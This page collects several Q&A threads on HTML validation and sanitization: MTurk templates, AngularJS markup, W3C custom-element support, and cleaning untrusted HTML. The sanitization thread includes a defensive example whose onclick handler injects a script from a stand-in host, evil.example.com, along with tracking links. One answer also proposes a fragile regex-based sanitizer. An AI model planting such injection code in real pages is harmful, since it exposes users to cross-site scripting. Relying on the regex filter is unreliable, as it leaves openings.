Mechanical Turk Failure to Parse HTML - how best to check it? - html

When trying a test batch of a simple HIT, I discovered that the submit button does not work. I then noticed that when looking at the Layout ID it says that
There was an error parsing the HTML5 data in your hit template.
This was just a quickie HIT that I built by hand based on an existing template, but I figure I must have messed up the HTML somewhere since I was editing it by hand.
When I try to copy/paste the source of my HIT into the W3 validator, the things it complains about are not parts of the template that I touched, and mostly seems to be about the fact that my source is not a complete HTML document because MTurk will be wrapping it:
Warning: Consider adding a lang attribute to the html start tag to declare the language of this document.
Error: Start tag seen without seeing a doctype first. Expected .
Error: Element head is missing a required instance of child element title.
Warning: The type attribute for the style element is not needed and should be omitted.
Is there an easy way to access the full wrapped HTML of the HIT for validation? Or some better way of troubleshooting my HTML.

You're correct that MTurk will wrap the HTML you provide. You can see the boilerplate XML it will add on the documentation for HTMLQuestion. These docs are intended for developers using the API, but it will show you what's happening with your HTML.
That said, it shouldn't matter. Just make valid HTML and you'll be okay. For example, the <title> tag won't be shown when Workers do your task, but leaving it in won't harm anything.
Also, a common mistake is to omit <!DOCTYPE html> on the first line. It's required as part of the HTML spec, but browsers aren't strict about it, so most people don't do it. But MTurk, and the W3 Validator, will both bark at you if you omit it.

Related

How to detect invalid HTML in AngularJs (unmatched tags)

For plain old HTML, I use the W3C validation service, but it has objections to Angualr directives.
I am having problens with WARNING: Tried to load angular more than once, and some possible solutions that I read suggest that it is caused by malformed HTML, specifically unclosed tags.
How can I detect such problems?
Obviously, I have checked that I am not directly including Angular twice
I'd say proper indentation and a good IDE are the best tools you have on this front - personally I use PHPStorm (WebStorm would also do the same) for my Angular development which will highlight warnings for the angular attributes by default but highlight errors like unclosed tags/quotes etc. in red
Indentation prevents things like open tags, the IDE helps out with open quotation marks on attributes which are probably the 2 issues most likely to cause issues.
Angular doesn’t “see” your raw HTML
The real trick here is that JavaScript (and, in turn Angular) does not work directly with your HTML. It works with the page’s DOM, which is created from your HTML.
When a browser creates a DOM from HTML, one of the major things is does is to "auto correct" any errors in the HTML. So, Angular won’t even see the errors in your HTML — it will just see the resulting “auto-corrected” DOM. (Of course, the more errors in your HTML, the more likely something would be auto-corrected in a way that causes you a problem.)
In theory, you could compare a page’s HTML source with the resultant DOM to find differences which might be errors. In practice, that would be highly problematic, and prone to reporting a high volume of false positives.
What then, can we validate HTML from web sites?
If you would like to validate your HTML markup from a web page, the best way would be to install your instance of a well-suppored HTML validator (like W3C’s validator) and hook into that.
You can capture a page’s DOM with a little jQuery (which you most likely have if you are using AngularJS):
var domString = $("html").prop("outerHTML");
Then, just post that string as input to your favorite validator.
I think you would need to compare the validation of this DOM string to validation of the HTML, as an error in the raw HTML is more likely to be where your problem is.

W3C validation for <ui-select>

I am using angular-ui-select within a website where the styled select fields are configured with an own tag named ui-select. This works great, but doing a W3C validation leads to this error:
Element ui-select not allowed as child of element div in this context. (Suppressing further errors from this subtree.)
Here's an example code:
<!doctype html>
<html lang="en">
<head><title>x</title></head>
<body>
<div>
<ui-select></ui-select>
</div>
</body></html>
I understand that <ui-select> is not expected to be there but how can I handle this better?
Can I wrap it into a different tag or is there a different approach for ui-select instead of using HTML markup?
W3C HTML5 validator maintainer here. The short answer with regard to the validator behavior right now is, the validator's going to emit errors for any custom elements you use in documents, and currently there's no way you as a user can work around it doing that—and it's going to continue that way for some time longer until we get around to figuring out a solution.
We're having some ongoing discussions about how to solve this. Changing the validator to just ignore any element name with a hyphen is not viable as a complete solution, because the consequence of that is we could then not practically check any child elements it might have—we'd just have to ignore the entire subtree, because to do otherwise would lead to other errors. So that's way short of being an ideal solution.
Anyway, I'd love to find a good way to solve this, so if others have ideas I'd like to hear them. Two good places to send ideas/proposals on this are the public-webapps#w3.org mailing list https://lists.w3.org/Archives/Public/public-webapps/ and the whatwg#whatwg.org mailing list https://whatwg.org/mailing-list#specs
One idea I've thought of myself is, we could just have the validator treat all custom elements in the same way it currently treats the <div> element (as far as where it's allowed in a document and what child elements it's allowed to contain). That's also short of ideal, but at least it would give a way to check for errors in descendant elements in the custom element's subtree.
Update 2017-02-06: the W3C HTML Checker now supports custom elements
So, I added support for custom elements to the W3C HTML Checker (validator) on 2016-12-16 and a few days later refined it to do more detailed checking for prohibited names.
The trick I ended up figuring out to implement it in the checker architecture—which is at its core a RelaxNG grammar/schema-based validator—was to add a pre-processing filter that take any elements that have a hyphen in their element name, and puts them in a separate XML namespace.
Then I updated the RelaxNG schema to allow any elements from that XML namespace anywhere. (Which is ironic because I pretty much hate XML namespaces and all the problems they cause.)
So we’re now looking at doing something similar for custom-attribute names—probably just by defining those as being any attribute names that contain a hyphen (like custom-element names).
But the HTML checker can’t be changed to allow custom-attribute names until the HTML spec is updated to allow them. For that, see the proposal being discussed in the HTML-spec issue tracker.
That's indeed a long-known issue with AngularJS.
A few things you can do:
Instead of using the element <ui-select>, you can use <div ui-select>, but that will still fail on the argument.
An argument prefixed with x- or data- will pass but I am not sure ui-select supports that.
HTML W3C validation is useful, but I think mostly important for HTML emails so they don't get screened as spam. It's also good for search engines, but really not that critical.
If you look at 'why validate', the reasons are mostly for cleanliness, ease of debugging, and overall good practice.
Angular (un?)fortunately expands the realm of possibilities for HTML5, in a way that, naturally, deviates from the latest specifications for HTML.
We are having the same problem using Knockout custom components.
http://knockoutjs.com/documentation/component-overview.html
I added a suggestion how to enhance the validator with a minor enhancement for users wanting to use custom elements even if the specification is not yet final (http://w3c.github.io/webcomponents/spec/custom/#custom-tag-example):
https://github.com/validator/validator/issues/94

Non formatting tags outside html tag

I have a rather bizarre usecase.
I need a tag on top of a html document that will not be used in formatting but that will contain some information for the parsing entity to act upon (flags & data).
Normally comments are used for this:
<!-- foo = bar -->
<html>
etc.
Now we can strip 'foo' from the comment when the html is parsed and act upon its value 'bar'.
However I am now in the situation that one of the intermediate systems strips all comments from the html as it sends it along.
So my question is: What other tags can go outside of the html tag without breaking the html specs (too much)?
I know of the <!doctype> tag, but you cannot really put in data there without breaking something
NB:
yes, I know this kind of signalling is ugly, but these are not my systems, I must provide such a flag.
all comments are stripped
js is not executed (yet) so we cant do it via the dom
This is a less than ideal situation but you can add anything inside the doctype tag like this:
<!doctype html public 'You are free to add anything here'>
I'm not sure how much data is allowed in there but this shouldn't mess with the parsing of the page.

What can I use to sanitize received HTML while retaining basic formatting?

This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s);)();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have the problems like Microsoft Anti-XSS library,
Is unit tested with the
OWASP XSS Filter Evasion Cheat Sheet
is special built for this (in contrast to HTML Agility Pack, which is a parser)
Also on NuGet
I am sensing you would definately need a parser that can generate a XML/DOM source so that you can apply fiter on it to produce what you are looking for.
See if HtmlTidy or Mozilla or HtmlCleaner parsers can help. HtmlCleaner has lot of configurable options which you might also want to look at. Specifically the transform section that allows you to skip the tags you doesn't require.
I would suggest using another approach. If you control the method in which the HTML is viewed I would remove all threats by using a HTML render that doesn't have a ECMA script engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem, i took some time facing it because there are a lot of things we want to remove from user imput, and even if i do a long list of things to be removed, latter on HTML can evolve and my list would have some holes.
Nonetheless i want users to input some simple things like bold, italic, paragraphs... prety simple.
No doubts the allowed things list is shorter and html can change latter on, that wont make holes on my list unless html stops supports this simple things.
So start thinking otherwise, say just what you allow, with great pain because i'm not an expert on regex (so please some regex people correct me here or improve) i coded this expression and its working form me even before HTML5 arrive.
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags, feel free to add some.
this is a startpoint and thats why some regex people should improve to remove also the attributes, like onclick
if i do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other stuff will be removed but the corresponding closing tags will remain, and after all we don't want those tags removed we just want to remove the tag attributes.
maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
am i right? can this be composed into a single pass?
we still have no relation between tags (opening/closing), no great deal till now.
Can the attribute remove be write to remove all not from a white lists? (possibly yes).
a last problem.. when removing tags like script the content remains, its desirable when removing font but not script, well we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
that will remove certain tags and its content.. but its a black list, meaning you have to keep an eye on it in case html changes.
note: all with "gi"
edit:
joined all the above on this function
String.prototype.sanitizeHTML=function (white,black) {
if (!white) white="b|i|p|br";//allowed tags
if (!black) black="script|object|embed";//complete remove tags
e=new RegExp("(<("+black+")[^>]*>.*</\\2>|(?!<[/]?("+white+")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
return this.replace(e,"");
}
-black list -> complete remove tag and content
-white list -> retain tags
other tags are removed but tag content is retained
all attributes of white list tag's (the remaining ones) are removed
still there is place for a white list of attributes (not implemented above) because if i want to preserve IMG then the src must stay... and what about tracking images?

HTML validator which ignores everything inside SCRIPT tags

The W3C HTML validator reports errors in lines which are inside script <script> tags. It's creating a lot of noise in the validation output. I can wrap my own script in CDATA but I have a lot of script added dynamically by third party controls.
Is there an HTML validator which can ignore everything in all <script> sections?
Short Bad Answer
If you wish to continue to use the w3 validator but get rid of certain errors regarding html in script tags, you can comment your JavaScript as shown in this guide. This is clearly a hack and is not recommended.
Long Good Answer
The main point of a validator is to ensure your code keeps to standards. The documentation for the w3 validator points you to this guidance and the w3 itself has a guide on keeping html within script to standards.
Personally, I don't see a point of a validator that selectively ignores some standards. You can't know how a random browser is going to implement the w3 standard and just because the major browsers assumedly do not do anything wrong when ignoring errors embedded in script tags, that doesn't mean there aren't browsers that don't conform to standards more closely. Furthermore, there is no guarantee that major browsers won't change their implementation in the future to be closer to standards and thus break your code. It is better to fix the errors you are getting rather than ignore them.
Solution:
Remove the offending third party scripts while you're validating the HTML.
It might be that Michael Robinson's suggestion or Rupert's Bad Short Answer can be done programmatically, though it might be painful to program.
If you can put a proxy or filter in front of your page that strips or modifies the script tags on the fly, the validator will not see the scripts.
Unfortunately, stripping the scripts is only easy if you've got valid XHTML, in which case of course you mightn't really need the validator...
Aside from the fact that this might be fun to try, I'm in favor of Rupert's Long Good Answer.